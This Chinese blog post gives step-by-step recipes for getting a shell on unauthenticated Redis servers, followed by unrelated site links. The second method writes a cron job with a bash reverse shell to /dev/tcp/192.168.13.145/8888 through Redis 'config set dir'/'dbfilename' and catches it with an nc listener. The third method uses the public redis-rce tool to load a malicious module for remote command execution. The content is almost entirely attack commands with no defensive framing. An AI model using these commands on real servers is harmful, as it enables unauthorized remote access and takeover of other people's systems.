当前位置: 首页 > news >正文

redis getshell的三种方法

news 2025/7/29 6:27:36

方法一

未授权访问复现-CSDN博客 的第一个。

方法二

wget http://download.redis.io/releases/redis-4.0.9.tar.gz

解压编译: 

tar -zxvf redis-4.0.9.tar.gz
cd redis-4.0.9
make
make test
make install

更改配置文件:

vim redis.conf //修改redis.conf的配置文件添加bind:0.0.0.0

启动redis:

redis-server /root/redis-4.0.9/redis.conf

攻击机开启连接: 

redis-cli -h 47.93.51.60
set  xx   "\n* * * * * bash -i >& /dev/tcp/192.168.13.145/8888 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

开启监听:

nc -lvvp 8888

方法三

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
git clone https://github.com/Ridter/redis-rce.git

进入RedisModules-ExecuteCommand目录输入make,生成moudle.so 文件 。

cp /home/wangyibo/桌面/RedisModules-ExecuteCommand/module.so /home/wangyibo/桌面/redis-rce

把生成的moudle.so复制到redis-rce目录里面,之后进入redis-rce目录里面输入 

python redis-rce.py -r 192.168.13.145 -p 6379 -L 192.168.111.130 -f moudle.so
http://www.dtcms.com/a/302399.html

相关文章:

  • LLM Landscape:2025年大语言模型概览
  • 软工八将:软件开发全流程核心角色体系解析
  • 四、计算机组成原理——第3章:存储系统
  • 分布式渲染效能探析:关键网络性能要素
  • 科技风杂志《科技风》杂志社科技风编辑部2025年第19期目录
  • RWA 正当红,是 DeFi 的终点、拐点,还是新起点?
  • 使用LlamaIndex将私有数据接入大模型
  • 红绿灯纵向距离的评估
  • SpringBoot 发送邮件
  • ServBay 1.15.0 更新,拥抱 Bun Deno 新生态
  • 负载均衡集群HAproxy
  • Claude Launcher:支持Kimi K2的Claude Code可视化启动工具
  • Java面试宝典:MySQL事务底层和高可用原理
  • VUE2 学习笔记11 脚手架
  • 工业前端组件库重构心法:如何让开发效率提升60%的交互模块设计逻辑
  • STM32 USB HOST 驱动FT232 USB转串
  • Flutter在购物场景中BLoC的应用
  • linux安装zsh,oh-my-zsh,配置zsh主题及插件的方法
  • 用了Flutter包体积增大就弃用Flutter吗?包体积与开发效率,这两者之间如何权衡?
  • 形参表不匹配(BUG)
  • 【Git】Linux-ubuntu 22.04 初步认识 -> 安装 -> 基础操作
  • 标准SQL语句示例
  • 专题:2025医药生物行业趋势与投融资研究报告|附90+份报告PDF、原数据表汇总下载
  • 云服务器以域名形式访问机房Kubernetes集群服务之解决方案
  • 时序数据基座升维:Apache IoTDB 以“端边云AI一体化”重构工业智能决策
  • 06-原型和原型链
  • iOS 离屏渲染
  • 【RH134 问答题】第 6 章 管理 SELinux 安全性
  • Java集合遍历的几种方式
  • 1.DRF 环境安装与配置